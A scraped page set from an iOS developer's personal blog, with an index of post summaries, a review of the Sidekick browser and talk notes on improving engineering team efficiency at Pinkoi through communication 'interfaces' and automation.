Sorry, we've misplaced that URL or it's pointing to something that doesn't exist.
diff --git a/.nojekyll b/.nojekyll new file mode 100644 index 0000000000..8b13789179 --- /dev/null +++ b/.nojekyll @@ -0,0 +1 @@ + diff --git a/404.html b/404.html new file mode 100644 index 0000000000..d71c5b503b --- /dev/null +++ b/404.html @@ -0,0 +1 @@ +
Sorry, we've misplaced that URL or it's pointing to something that doesn't exist.
A new version of content is available.
iOS/Web Developer @ Taipei / Taiwan 🇹🇼
ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.
ZMediumToMarkdown is a powerful tool that allows you to effortlessly download and convert your Medium posts to Markdown format.
ZReviewTender is a tool for fetching app reviews from the App Store and Google Play Console and integrating them into your workflow.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
The Craft of Building a Handmade HTML Parser The development log of ZMarkupParser HTML to NSAttributedString rendering engine Tokenization conversion of HTML String, Normalization processing, gen...
Record of Practical Application of Design Patterns Record of problem scenarios encountered and solutions applied when encapsulating Socket.IO Client Library requirements using Design Patterns P...
The Past and Present of iOS Privacy and Convenience Apple’s privacy principles and the adjustments to privacy protection features in iOS over the years Theme by slidego [2023–08–01] iOS 17 Upda...
Behavior Change in Merging NSAttributedString Attributes Range in iOS ≥ 18 Starting from iOS ≥ 18, merging NSAttributedString attributes Range will reference Equatable Photo by C M Issue Origin...
Practical Application Record of Design Patterns—In WKWebView with Builder, Strategy & Chain of Responsibility Pattern Scenarios of using Design Patterns (Strategy, Chain of Responsibility, Bui...
[Travelogue] 2024 Bangkok 🇹🇭 5-Day Free and Easy Trip Returning to Thailand after the pandemic, a quick 5-day free and easy trip to Bangkok. Memories of Bangkok Going back to 2018, it was the ...
[iOS] Temporary Workaround for Black Launch Screen Bug After Several Launches Temporary workaround to solve XCode Build & Run app black screen issue Photo by Etienne Girardet Issue I don’...
iOS Shortcut Automation Scenarios - Automatically Forwarding Text Messages and Creating Reminder Tasks iOS uses Shortcuts to easily automate forwarding specific text messages to Line and automatic...
iOS Vision framework x WWDC 24 Discover Swift enhancements in the Vision framework Session Vision framework review & trying out new Swift API in iOS 18 Photo by BoliviaInteligente Topic ...
Medium Partner Program is finally open to global (including Taiwan) writers! Everyone can join the Medium Partner Program to earn revenue by writing articles. Photo by Steve Johnson Murmur Th...
A new version of content is available.
All About iOS UUID (Swift/iOS ≥ 6) iPlayground 2018 Recap & All About UUID Introduction: Last Saturday and Sunday, I attended the iPlayground Apple software developer conference. This event ...
[Deprecated] Enhance User Experience by Adding 3D TOUCH to Your iOS APP (Swift) iOS 3D TOUCH Application [Deprecated] 2020/06/14 3D Touch functionality has been removed in iPhone 11 and later...
Exploring iOS 12 CoreML — Automatically Predict Article Categories Using Machine Learning, Even Train the Model Yourself! Explore CoreML 2.0, how to convert or train models and apply them in real ...
Exploring Vision — Automatic Face Detection and Cropping for Profile Pictures (Swift) Practical Application of Vision [2024/08/13 Update] Refer to the new article and API: “iOS Vision framewor...
iOS ≥ 10 Notification Service Extension Application (Swift) Image push notifications, push notification display statistics, pre-processing before push notification display Regarding the basics of...
iOS UITextView Text Wrapping Editor (Swift) Practical Route Target Functionality: The app has a discussion area where users can post articles. The interface for posting articles needs to support...
The Beginning is Always the Hardest It has been over 4 years since I last managed a blog. The remaining ad revenue of US$88 has been stuck there. Recently, I discovered that I could request to can...
A new version of content is available.
Research on Preloading and Caching Page and File Resources in iOS WKWebView Study on improving page loading speed by preloading and caching resources in iOS WKWebView. Photo by Antoine Gravier ...
[Travelogue] 2024 Second Visit to Kyushu 9-Day Free and Easy Trip, Entering Japan via Busan→Fukuoka Cruise Boarding the Shin Arashiyama Camellia Cruise from Busan, South Korea to Fukuoka, Japan, v...
[iOS] Exploring the Use of NSTextList or NSTextTab for List Indentation with NSAttributedString Implementing list indentation similar to HTML List OL/UL/LI using NSTextList or NSTextTab with NSAtt...
Plane.so Docker Self-Hosted Setup Record Plane Self-Hosted Docker setup, backup, restore, Nginx Domain reverse proxy configuration tutorial Introduction Plane.so is a free open-source project ...
Plane.so Free Open Source and Self-Hosted Support Project Management Tool Similar to Asana/Jira Introduction to the use of Plane.so project management tool with Scurm process Background Asana ...
What Can Be Done to Commemorate When an App Product Reaches Its End? Using mitmproxy + apple configurator to keep an App in its pre-removal state forever Introduction Jujutsu Kaisen After wor...
Implementing Google Services RPA Automation with Google Apps Script Implementing Robotic Process Automation for Google Workspace services using Google Apps Script Photo by Possessed Photography...
Slack & ChatGPT Integration Build your own ChatGPT OpenAI API for Slack App (Google Cloud Functions & Python) Background Recently, I have been promoting the use of Generative AI within t...
[Travelogue] 2023 Hiroshima Okayama 6-Day Free Trip 6-day trip to Hiroshima, Okayama, Fukuyama, Kurashiki, and Onomichi in 2023 Preface After resigning at the end of August and immediately embar...
[Travelogue] 2023 Kyushu 10-Day Solo Trip Record of a 10-day solo trip to Fukuoka, Nagasaki, and Kumamoto in Kyushu [2024 Update] Second Visit to Kyushu Visited Kyushu for the second time in J...
A new version of content is available.
[Travelogue] 9/11 Nagoya One-Day Flash Free Travel Peach Aviation Nagoya One-Day Flash Ticket Travel Experience Background A round-trip ticket for a day trip to Nagoya is an activity launched by...
[POC] App End-to-End Testing Local Snapshot API Mock Server Verification of the feasibility of implementing E2E Testing for existing apps and existing API architecture Photo by freestocks Intro...
Using Google Apps Script to Create a Free Github Repo Star Notifier in Three Steps Writing GAS to connect Github Webhook and forward star notifications to Line Introduction As a maintainer of op...
[Travelogue] 2023 Tokyo 5-Day Free and Easy Trip Record and travel information for a 5-day free and easy trip to Tokyo in June 2023, following the Kansai region trip last month. 2023/05 Kansai Re...
[Travelogue] 2023 Kansai 8-Day Free and Easy Trip Record of an 8-day free and easy trip to Kyoto, Osaka, and Kobe in May 2023, including information on food, accommodation, and transportation. Pr...
ZMediumToJekyll Move your Medium posts to a Jekyll blog and keep them in sync in the future. This tool can help you move your Medium posts to a Jekyll blog and keep them in sync in the future...
ZMarkupParser HTML String to NSAttributedString Tool Convert HTML String to NSAttributedString with corresponding Key style settings ZhgChgLi / ZMarkupParser ZhgChgLi / ZMarkupParser Featur...
Pinkoi 2022 Open House for GenZ — 15 Mins Career Talk Pinkoi Developers’ Night 2022 Year-End Exchange Meeting — 15 Minutes Career Sharing Talk Pinkoi Developers’ Night 2022 Year-End Exchange Meet...
ZReviewTender — Free Open Source App Reviews Monitoring Bot Real-time monitoring of the latest app reviews and providing instant feedback to improve collaboration efficiency and consumer satisfact...
App Store Connect API Now Supports Reading and Managing Customer Reviews App Store Connect API 2.0+ comprehensive update, supports In-app purchases, Subscriptions, Customer Reviews management 202...
A new version of content is available.
Painless Migration from Medium to Self-Hosted Website Migrating Medium content to Github Pages (with Jekyll/Chirpy) zhgchg.li Background In the fourth year of running Medium, I have accumulate...
iOS: Insuring Your Multilingual Strings! Using SwifGen & UnitTest to ensure the safety of multilingual operations Photo by Mick Haupt Problem Plain Text Files iOS handles multilingual su...
Visitor Pattern in TableView Enhancing the readability and extensibility of TableView using the Visitor Pattern Photo by Alex wong Introduction Following the previous article on “Visitor Patt...
Implementing iOS NSAttributedString HTML Render Yourself An alternative to iOS NSAttributedString DocumentType.html Photo by Florian Olivo [TL;DR] 2023/03/12 Re-developed using another method ...
Converting Medium Posts to Markdown Writing a small tool to back up Medium articles & convert them to Markdown format ZhgChgLi / ZMediumToMarkdown [EN] ZMediumToMarkdown I’ve written a pro...
Crashlytics + Google Analytics Automatically Query App Crash-Free Users Rate Using Google Apps Script to query Crashlytics through Google Analytics and automatically fill it into Google Sheet ...
Crashlytics + Big Query: Creating a More Immediate and Convenient Crash Tracking Tool Integrating Crashlytics and Big Query to automatically forward crash records to a Slack Channel Results ...
2021 Pinkoi Tech Career Talk - Decoding the High-Efficiency Engineering Team Decoding the high-efficiency engineering team at Pinkoi Tech Talk Decoding the High-Efficiency Engineering Team 202...
Using Google Apps Script to Forward Gmail Emails to Slack Use Gmail Filter + Google Apps Script to automatically forward customized content to Slack Channel when receiving emails Photo by Lukas...
[Productivity Tools] Abandon Chrome and Embrace Sidekick Browser Introduction and Experience with Sidekick Browser 2024 Update Around early 2023, I switched to using Arc Browser! The user experi...
A new version of content is available.
Leading Snowflakes — Reading Notes “Leading Snowflakes The Engineering Manager Handbook” — Oren Ellenbogen Entering a management position for the first time can be very confusing; the knowledge...
Visitor Pattern in Swift (Share Object to XXX Example) Analysis of the practical application scenarios of the Visitor Pattern (sharing items like products, songs, articles… to Facebook, Line, Link...
Building a Fully Automated WFH Employee Health Reporting System with Slack Enhancing work efficiency by playing with Slack Workflow combined with Google Sheet with App Script Photo by Stephen P...
ZReviewsBot — Slack App Review Notification Bot Free and open-source iOS & Android APP latest review tracking Slack Bot TL;DR [2022/08/10] Update: Now redesigned using the new App Store Conn...
AppStore APP’s Reviews Slack Bot Insights Using Ruby+Fastlane-SpaceShip to build an APP review tracking notification Slack bot Photo by Austin Distel Ignorance is bliss AppReviewBot as an ex...
Quickly Build a Testable API Service Using Firebase Firestore + Functions When push notification statistics meet Firebase Firestore + Functions Photo by Carlos Muza Introduction Accurate Push N...
Password Recovery SMS Verification Code Security Issue Demonstrating the severity of brute force attacks using Python Photo by Matt Artz Introduction This article doesn’t contain much technica...
Bye Bye 2020: A Review of the Second Year on Medium A very late review of 2020 Image taken from the official poster of Simple Life Festival 2020, where I served as an iOS Developer for StreetVo...
Medium Custom Domain Feature Returns Take care of your Domain Authority yourself! [2024/07/28] Feature Returns A series of ups and downs, this feature was opened in 2012, then closed; reopen...
Revealing a Clever Website Vulnerability Discovered Years Ago Website security issues caused by multiple vulnerabilities combined Photo by Tarik Haiga Introduction A few years ago, while still...
A new version of content is available.
Using Python+Google Cloud Platform+Line Bot to Automate Routine Tasks Creating a daily automatic check-in script using a check-in reward app as an example Photo by Paweł Czerwiński Origin I ha...
[Reinstallation Note 1] - Laravel Homestead + phpMyAdmin Environment Setup Setting up a Laravel development environment from scratch and managing MySQL databases with phpMyAdmin GUI Laravel ...
What’s New with Universal Links iOS 13, iOS 14 What’s New with Universal Links & Setting Up a Local Testing Environment Photo by NASA Preface For a service that has both a website and an ...
iOS Cross-Platform Account and Password Integration to Enhance Login Experience A feature more worthwhile than Sign in with Apple Photo by Dan Nelson Features One of the most common problems i...
Comprehensive Guide to Implementing Local Cache with AVPlayer AVPlayer/AVQueuePlayer with AVURLAsset implementing AVAssetResourceLoaderDelegate Photo by Tyler Lastovich [2023/03/12] Update I...
[Old] AVPlayer Real-time Cache Implementation Understanding the implementation of AVPlayer/AVQueuePlayer with AVURLAsset using AVAssetResourceLoaderDelegate [2021–01–31] Article Announcement: Art...
iOS APP Version Numbers Explained Version number rules and comparison solutions Photo by James Yarema Introduction All iOS APP developers will encounter two numbers, Version Number and Build N...
Apple Watch Original Stainless Steel Milanese Loop Unboxing Apple Original Stainless Steel 44mm Graphite Milanese Loop Unboxing Following the previous post “Apple Watch Series 6 Unboxing & Tw...
Apple Watch Series 6 Unboxing & Two-Year Usage Experience Apple Watch Series 6 Unboxing and Buying Guide & Two-Year Usage Experience Summary Preface Time flies, it’s been two years since...
Write Shell Script Directly in Swift with Xcode! Introducing Localization multi-language and Image Assets missing check, using Swift to create Shell Script Photo by Glenn Carstens-Peters Backgr...
A new version of content is available.
iOS 14 Clipboard Data Theft Panic: The Dilemma of Privacy and Convenience Why do so many iOS apps read your clipboard? Photo by Clint Patterson ⚠️ 2022/07/22 Update: iOS 16 Upcoming Changes St...
Real-World Codable Decoding Issues (Part 2) Handling Response Null Fields Reasonably, No Need to Always Rewrite init decoder Photo by Zan Introduction Following the previous article “Real-Worl...
Is it Still Up-to-Date to Build a Personal Website Using Google Site? New Google Site Personal Website Building Experience and Setup Tutorial Update 2022–07–17 Currently, I have used my self-w...
Real-world Decode Issues with Codable (Part 1) From basic to advanced, deeply using Decodable to meet all possible problem scenarios Photo by Gustas Brazaitis Preface Due to the backend API up...
Easily Create a ‘Fake’ Transparent Perspective Wallpaper Using iPhone Using iMovie’s green screen keying feature to composite videos Anyway, I’m Bored Working during the day, exploited by capita...
Creating a Comfortable WFH Smart Home Environment, Control Appliances at Your Fingertips Demonstrating the use of Raspberry Pi as a HomeBridge host to connect all Mi Home appliances to HomeKit ...
Exploring Methods for Implementing iOS HLS Cache How to achieve caching while playing m3u8 streaming video files using AVPlayer photo by Mihis Alex [2023/03/12] Update The next article, “Com...
First Experience with iOS Reverse Engineering Exploring the process from jailbreaking, extracting iPA files, shelling, to UI analysis, injection, and decompilation About Security The only thing ...
iOS Expand Button Click Area Rewrite pointInside to expand the touch area In daily development, it is often encountered that after arranging the UI according to the design, the screen looks beaut...
Medium One-Year Review A review of one year on Medium or a summary of 2019 In the blink of an eye, it’s been a year since I started publishing articles on Medium. The actual anniversary should be...
A new version of content is available.
Mi Home APP / Xiao Ai Speaker Region Issues Newly purchased Xiaomi Air Purifier 3 & recording the linkage issues between Mi Home and Xiao Ai Speaker Preface This is the fourth article about ...
iOS UIViewController Transition Techniques Complete guide to pull-down to close, pull-up to appear, and full-page right swipe back effects in UIViewController Introduction I’ve always been cur...
iOS Deferred Deep Link Implementation (Swift) Build an app transition flow that adapts to all scenarios without interruption [2022/07/22] Update on iOS 16 Upcoming Changes Starting from iOS ≥ 16...
Using ‘Shortcuts’ Automation with Mi Home Smart Home on iOS ≥ 13.1 Automate operations directly using the built-in Shortcuts app on iOS ≥ 13.1 Introduction In early July this year, I bought two ...
New Xiaomi Smart Home Purchases AI Speaker, Temperature and Humidity Sensor, Scale 2, DC Inverter Fan Usage Experience Getting Started Following the previous post “Smart Home First Experience — ...
What was the experience of iPlayground 2019 like? Hot participation experience of iPlayground 2019 About the event Last year it was held in mid-October, and I also started running Medium to reco...
The APP uses HTTPS for transmission, but the data was still stolen. Using mitmproxy on iOS+MacOS to perform a Man-in-the-middle attack to sniff API transmission data and how to prevent it? Introd...
How to Create an Engaging Engineering CTF Competition Building and brainstorming for Capture The Flag competitions About CTF Capture The Flag, abbreviated as CTF, is a game originating from the ...
Apple Watch Case Unboxing Experience (Catalyst & Muvit) Catalyst Apple Watch Ultra-Thin Waterproof Case & Muvit Apple Watch Case [Latest Update] Apple Watch Series 6 Unboxing & Two...
First Experience with Smart Home - Apple HomeKit & Xiaomi Mijia Mijia Smart Camera and Mijia Smart Desk Lamp, Homekit Setup Tutorial [2020/04/20] Advanced Tutorial Released : Experienced use...
A new version of content is available.
AirPods 2 Unboxing and Hands-On Experience (Laser Engraved Version) More ingenious, incredibly amazing. [Latest] Apple Watch Series 6 Unboxing & Two-Year Experience >>>Click Here Whe...
Perfect Implementation of One-Time Offers or Trials in iOS (Swift) iOS DeviceCheck follows you everywhere While writing the previous Call Directory Extension, I accidentally discovered this obscu...
Identify Your Own Calls (Swift) iOS DIY Whoscall Call Identification and Phone Number Tagging Features Origin I have always been a loyal user of Whoscall. I used it when I originally had an Andr...
iOS tintAdjustmentMode Property Issue with .tintColor setting failing when presenting UIAlertController on this page’s Image Assets (Render as template) Comparison Before and After Fix No length...
Let’s Build an Apple Watch App! (Swift) Step-by-step development of an Apple Watch App from scratch with watchOS 5 [Latest] Apple Watch Series 6 Unboxing & Two-Year Experience >>>Cli...
Apple Watch Series 4 Unboxing: Comprehensive Review from Unboxing to Mastery (Updated 2020–10–24) Why buy it? Is it useful? What’s good about it? How to use it? & WatchOS APP recommendations ...
Add ‘App Notification Settings Page’ Shortcut in User’s ‘Settings’ on iOS ≥ 12 (Swift) Besides turning off notifications from the system, give users other options Following the previous three art...
Always Keep the Enthusiasm for Exploring New Things The life opportunity from stepping into the information field to switching to iOS APP development Bangkok 2018 - Z Realm — You are not alone ...
Handling Push Notification Permission Status from iOS 9 to iOS 12 (Swift) Solution for handling notification permission status and requesting permissions from iOS 9 to iOS 12 What to do? Followi...
What? iOS 12 Can Send Push Notifications Without User Authorization (Swift) — (Updated 2019-02-06) Introduction to UserNotifications Provisional Authorization and iOS 12 Silent Notifications MurM...
A new version of content is available.
Introduction and Experience with Sidekick Browser
Around early 2023, I switched to using Arc Browser! The user experience and features are better, with fewer bugs, and it also supports cross-device synchronization.
Here’s a link to download Arc, the browser I was telling you about!
I learned about Sidekick Browser from a colleague. To be honest, I didn’t have high expectations at first. Over the years, I have considered abandoning Chrome and tried Safari, Safari beta, Firefox, Opera, and third-party browsers based on open-source cores. However, these attempts failed repeatedly, and I ended up switching back to Chrome within a few days. Another reason is that I haven’t actively followed the browser market, so there may have been browsers that met my needs, but I was unaware of them.
The main reason is that my frequently used extensions are not fully supported. I was too reliant and accustomed to Chrome’s extensions. Even though browsers based on the Chromium core could support them seamlessly, they lacked standout features and the experience was similar to using Google Chrome.
Regarding productivity features, Chrome’s extension library offers millions of tools that can be used. By searching and combining them, one can achieve the desired results. However, without conducting research, I am not sure which processes and features are truly beneficial for productivity.
The content has been translated into English as requested.
Application can be quickly added from the homepage or added from the Tab by entering the URL or ICON image manually.
Sidekick has built-in hundreds of productivity tool websites that can be quickly added to the Application.
If the Application added from the homepage does not appear on the left Sidebar, you can drag it over yourself.
Right-click on the Application to quickly view recent visits, and also support switching between multiple accounts.
There are not many websites supported for multiple account switching. If not supported, you can use Private Mode first; currently tested to support Slack and Notion.
Each App can be individually configured, such as turning off notifications, turning off Badges, and so on.
Although MacOS comes with a window splitting feature, I actually use it very rarely; unless I want to fully focus, most of the time I need to synchronize browsing content + use other MacOS Apps, then the browser’s window splitting feature is very useful!
For example, you can attend online classes and take notes at the same time.
You can freely drag and adjust the size of the middle separator.
To use, just click on the window split button in the upper right corner of the browser, choose the window to add to the left, and click again to close the split.
Similar to MacOS’s Spotlight, you can press “Option” + “f” for full browser search in any window.
Similar to the popular Tab Saver extension on Chrome, it can quickly save the currently open Tab web pages and switch between them, making it easy for us to manage different work states.
Click on the “F” (First Session) in the lower left corner to enter the Session management page.
Click on “Add new session” at the top to save the current Tab state, open a completely new browsing environment.
You can switch between Sessions, click “Activate” to restore the Tab.
Sessions will not affect the Applications enabled on the left.
Starting now, as long as there is a Web version of communication service available, you can directly use the Sidekick Application without the need to install a computer application; as mentioned earlier, the Application’s notification function is as instant and complete as a computer application.
Integrated with Google Keep cloud note-taking feature, click on the document icon in the lower left corner to quickly open Google Keep for note-taking.
Google Keep is stored in the cloud Google account, supporting cross-platform and cross-device note synchronization.
You can use this feature to quickly record items.
Not sure if it will be changed to their own Sidekick Sync in the future, after all, this will provide optimization and integration space.
With the wave of privacy concerns, major companies are starting to focus on user privacy. Apple, as the primary leader, has begun to integrate privacy protection features in the new version of Safari. However, as the biggest beneficiary of privacy information, Google Ads, it may be difficult to see changes on Google Chrome.
Chromium != Chrome, Chromium is an open-source project at the core of browser technology.
Although Chromium is also led by Google, its open-source nature allows any developer to optimize based on this core. Sidekick also utilizes this method to optimize on the Chromium base, retaining Chrome’s features while enhancing functionalities lacking in Chrome.
More features waiting for you to explore and experience!
“It is a sin for a company not to make money. (If you don’t make money, it is a sin against society because we take society’s funds, attract society’s talents, and without sufficient surplus, we are wasting valuable resources that could be more effectively utilized elsewhere.)” - Panasonic founder, Konosuke Matsushita (text reference from the Business Thought Institute)
A good product needs good cash flow to provide better services and to last longer. Below are the pricing details for Sidekick:
For personal use, the free plan is more than sufficient, but if you are able, consider supporting the development team!
After using it for a while, due to the painless transition, I have completely abandoned Chrome. There is nothing that I must go back to Chrome for, and the best part is the Applications on the left, where I can add frequently used websites for quick access and notifications.
In the past, I would get lost in a clutter of tabs, or could only use the Pin Tab feature to keep important work services pinned at the front. However, switching was still painful and required searching.
Now, when I need to do a Code Review, I click on Github; when I need to submit an App, I click on App Store Connect; when I need to view a project, I click on Asana. Working is very efficient.
Regarding memory management, I haven’t done any specific research or testing, so I’m not sure about the optimization effect, but having it is better than not having it.
The only worry is that this product is still too new, and it’s uncertain how far it can go. If mismanagement occurs, development and maintenance may stop, which would be a great loss! So please promote and support it vigorously!
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Decoding the high-efficiency engineering team at Pinkoi Tech Talk
2021/09/08 19:00 @ Pinkoi x Yourator
My Medium: ZhgChgLi
Pinkoi’s work is composed of multiple Squads:
Each Squad is composed of various function teammates, including PM, Product Designer, Data, Frontend, Backend, iOS, Android, etc.; long-term and ongoing work goals are accomplished by the Squad.
In addition to Squads, there are also cross-team Projects that run, mostly short to medium-term work goals, where the initiator or any team member can act as the Project Owner, and the task is closed upon completion.
At the end, there is also how Pinkoi’s culture supports teammates in solving problems, if friends who are not interested in the actual content can directly scroll to the bottom of the page to view this section.
The relationship between team size growth and work efficiency, from startups with 10 people to teams of hundreds (not yet challenged by thousands), but just jumping from 10 to 100, the 10x difference is significant in many aspects.
With fewer people, communication and handling things are quick; discussing and resolving issues in person can be done swiftly, as the “human connection” is strong, enabling synchronous collaboration.
However, in situations with more people, direct communication becomes challenging because with more collaborators, each discussion can take up a whole morning; and with many people collaborating, tasks need to be prioritized, and non-urgent matters cannot be addressed immediately, requiring asynchronous waiting to work on other tasks.
Having more diverse roles join can lead to more specialized work division, increased productivity or quality, and faster output.
But as mentioned earlier, conversely; there will be more collaboration with people, which means more time spent on communication.
Moreover, small issues can be magnified, for example, if one person used to spend 10 minutes daily on a task like posting reports, it was manageable; but now, assuming there are 20 people, it multiplies, and each day, more than 3 hours are spent on posting reports; optimizing and automating this task becomes valuable at this point, saving 3 hours daily, which amounts to wasting an extra 750 hours over a year.
As the team size grows, for the App Team, there are these roles that collaborate more closely.
Backend — API, Product Designer — UI, these do not need to be mentioned, Pinkoi is an international product, so all functional texts need to be translated by the Localization Team. Also, because we have a Data Team doing data collection and analysis, besides developing features, we also need to discuss event tracking points with the Data Team.
Customer Service is also a team that frequently interacts with us. Besides users sometimes directly providing feedback on order issues through the marketplace, more often users leave a one-star rating saying they encountered a problem. At this time, we also need the customer service team to help with in-depth inquiries, such as what problem did you encounter? How can we help you?
With so many collaborative relationships mentioned above, it means there are many communication opportunities.
However, remember, we are not avoiding or minimizing communication as much as possible; excellent engineers also need good communication skills.
What we need to focus on is important communication, such as brainstorming, discussing requirements, content, and schedules; do not waste time on confirming repetitive issues or vague communication. Avoid situations where you ask me, I ask him, and so on.
Especially in the era of the pandemic, communication time is precious and should be spent on more valuable discussions.
“I thought you thought what I thought” — this sentence perfectly illustrates the consequences of unclear communication.
Not just in work, in daily life, we often encounter misunderstandings due to different perceptions, and in life, harmony relies on mutual understanding; but in work, it’s different. If different perceptions are not discussed in depth, it’s easy to find out during the production stage that things are not as expected.
The idea introduced here is to communicate through a consensus interface, similar to the Dependency Inversion Principle in object-oriented programming in SOLID principles (if you don’t understand, it’s okay); the same concept can be applied to communication.
The first step is to identify areas of communication that are unclear, need to be confirmed repeatedly, or require specific communication to be more focused and effective, or even situations where this delivery does not require additional communication.
Once the issues are identified, you can define an “interface.” An interface is a medium, which can be a document, process, checklist, tool, etc.
Use this “interface” as a bridge for communication between each other. There can be multiple interfaces, use the appropriate interface for each scenario; when encountering the same scenario, prioritize using this interface for initial communication. If further communication is needed, it can be based on this interface for focused discussion of the issues.
Here are 4 examples of interface communication in collaboration with the App Team:
For how to use the API, if simply providing the API Response String to the App Team, there can be areas of ambiguity, for example, how do we know if date
refers to Register Date or Birthday? Also, the scope is broad, many fields need confirmation.
This communication is also repetitive, requiring confirmation each time there is a new endpoint.
This is a classic case of ineffective communication.
Pinkoi uses Python (FastAPI) to automatically generate documentation from the API code, PHP can use Swagger (previous company practice); the advantage is that the framework and data format of the document can be automatically generated from the code, reducing maintenance costs, only needing to handle field descriptions.
p.s. Currently, new Python 3 will use FastAPI, and the old parts will be gradually updated. For now, PostMan is used as the communication interface.
The second one is collaborating with the Product Designer, which is similar to the Backend in principle, but the focus shifts to confirming UI Spec and Flow.
If the color codes and fonts are scattered, our App will also suffer. Setting aside the fact that requirements are like this, we don’t want situations where the same title has the same color but the color code is off or the UI at the same position is not consistent.
The most basic solution is to have the designer organize the UI components library, establish a Design System (Guideline), and mark them when designing UI.
Based on the Design System (Guideline) in the Code Base, we create corresponding Font, Color, and Button, View based on the component library.
When templating, use these established components for templating, making it easy for us to quickly align with the UI design draft.
But this is easily messed up and needs dynamic adjustments; it cannot cover too many exceptions, nor can it be rigid and not expand.
p.s. Collaboration with Product Designers at Pinkoi is mutual, where Developers can also suggest better practices and discuss with Product Designers.
The third one is the interface with Customer Service. Product reviews are crucial for products in the marketplace, but it involves a very manual and repetitive communication process.
Because we need to manually check for new reviews from time to time, and if there are customer service issues, we need to forward the issues to customer service for assistance, which is repetitive and manual.
The best solution is to automatically synchronize marketplace reviews to our work platform. You can spend $ to buy existing services or use my developed ZhgChgLi / ZReviewTender (2022 New).
For deployment methods, tutorials, and technical details, refer to: ZReviewTender - Free and Open-source App Reviews Monitoring Bot
This bot is our communication interface. It will automatically forward reviews to a Slack Channel, allowing everyone to quickly receive the latest review information, track, and communicate on it.
The last example is the dependency on the Localization Team’s work; whether it’s a new feature or modifying old translations, we need to wait for the Localization Team to complete the work and hand it over to us for further assistance.
The cost of developing our own tools is too high, so we directly use third-party services to help us break the dependency.
All translations and keys are managed by third-party tools. We just need to define the keys in advance, and both sides can work separately. As long as the work is completed before the deadline, there is no need for mutual reliance. After the Localization Team completes the translation, the tool will automatically trigger a git pull to update the latest text files in the project.
p.s. Pinkoi has had this process since very early on, using Onesky at that time, but in recent years, there are more excellent tools available, which you can consider adopting.
We talked about external factors, now let’s talk about internal factors.
When there are fewer people or when one developer maintains a project, you can do whatever you want. You have a high level of mastery and understanding of the project, which is fine. Of course, if you have a good sense, even if it’s a one-person project, you can handle all the things mentioned here.
But as the number of collaborating teammates increases, everyone is working under the same project. If everyone still works separately, it will be a disaster.
For example, doing API calls differently here and there, often reinventing the wheel wasting time, or not caring at all and just putting something online haphazardly, all will incur significant costs for future maintenance and scalability.
Within the team, rather than calling it an interface, I think it’s too formal; it should be about consensus, resonance, and a sense of teamwork.
The most basic and common topic is Coding Style, naming conventions, where to place things, how to use Delegates… You can use commonly used tools like realm / SwiftLint for constraints, and for multilingual sentences, you can use freshOS / Localize for organization (of course, if you are already using a third-party tool for management as mentioned earlier, you may not need this).
The second is the App architecture, whether it’s MVC/MVVM/VIPER/Clean Architecture, the key point is cleanliness and consistency; no need to pursue being trendy, just be consistent.
The Pinkoi App Team uses Clean Architecture.
Previously at StreetVoice, it was purely MVC but clean and consistent, making collaboration smooth.
Next is UnitTest, with many people, it’s hard to avoid the logic you’re working on from accidentally being broken; writing more tests provides an extra layer of protection.
Lastly, there’s the aspect of documentation, about the team’s work processes, specifications, or operation manuals, making it easy for teammates to quickly refer to when they forget, and for new members to quickly get up to speed.
Besides the Code Level interface, there are other interfaces in collaboration to help us improve efficiency.
The first is having a Request for Comments stage before implementing requirements, where the developer in charge roughly explains how this requirement will be implemented, and others can provide comments and ideas.
In addition to preventing reinventing the wheel, it can also gather more ideas, such as how others might expand in the future, or what requirements to consider later on… etc., as onlookers see more clearly than those involved.
The second is to conduct thorough Code Reviews, checking if our interface consensus is being implemented, such as: Naming conventions, UI layout methods, Delegate usage, Protocol/Class declarations… etc. Also, checking if the architecture is being misused or rushed due to time constraints, assuming the development direction should move towards full Swift development, and whether there are still Objective-C code being used… etc.
The main focus is on reviewing these aspects, with functionality correctness being secondary assistance.
p.s. The purpose of RFC is to improve work efficiency, so it shouldn’t be too lengthy or seriously delay work progress; it can be thought of as a simple pre-work discussion phase.
Consolidating the team’s internal interface consensus functions, finally mentioning the Crash Theory mindset, which I think is a good behavioral benchmark.
Applying it to the team means assuming that if everyone suddenly disappeared today, can the existing code, processes, and systems allow new people to quickly get up to speed?
Recap the meaning of interfaces, internal team interfaces are used to increase mutual consensus, external collaboration is to reduce ineffective communication, using interfaces as a means of communication without interruption, focusing on discussing requirements.
Reiterating that “interface communication” is not a special term or tool in engineering, it’s just a concept applicable to collaboration in any job scenario, it can simply be a document or process, with the sequence being to have this thing first and then communicate.
Assuming each additional communication time takes 10 minutes, with a team of 60 people, occurring 10 times per month, it wastes 1,200 hours per year on unnecessary communication.
The second chapter wants to share with everyone about the effects of automating repetitive work on improving work efficiency, using iOS as an example, but the same applies to Android.
It won’t mention technical implementation details, only discussing the feasibility in principle.
Organizing the services we use, including but not limited to:
The first issue to address is the problem of repetitiveness. During the development phase, when we want to allow other team members to test the app in advance, the traditional approach is to directly build it on their phones. If there are only 1-2 people, it’s not a big problem. However, if there are 20-30 team members to test, just helping with installing the beta version would take up a whole day of work. Additionally, if there are updates, everything has to start over.
Another method is to use TestFlight as a medium for distributing beta versions, which is also good. However, there are two issues. First, TestFlight is equivalent to the production environment, not the debug environment. Second, when there are many teammates working on different requirements simultaneously and needing to test different requirements, TestFlight can become chaotic, and the builds for distribution may change frequently, but it’s still manageable.
Pinkoi’s solution is to separate the task of “installing beta versions by the App Team” and use Slack Workflow as an input UI to achieve this. After inputting the necessary information, it triggers Bitrise to run Fastlane scripts to package and upload the beta version IPA to Firebase App Distribution.
For more information on using Slack Workflow applications, refer to this article: Building a Fully Automated WFH Employee Health Status Reporting System with Slack
Firebase App Distribution
Teammates who need to test simply follow the steps provided by Firebase App Distribution to install the necessary certificates, register their devices, and then choose the beta version they want to install or directly install it by clicking the link.
However, please note that iOS Firebase App Distribution is limited to Development Devices, with a maximum registration of 100 devices, based on devices rather than individuals.
Therefore, you may need to consider a balance between this solution and TestFlight (which allows external testing by up to 1,000 people).
At least, the Slack Workflow UI Input mentioned earlier is worth considering.
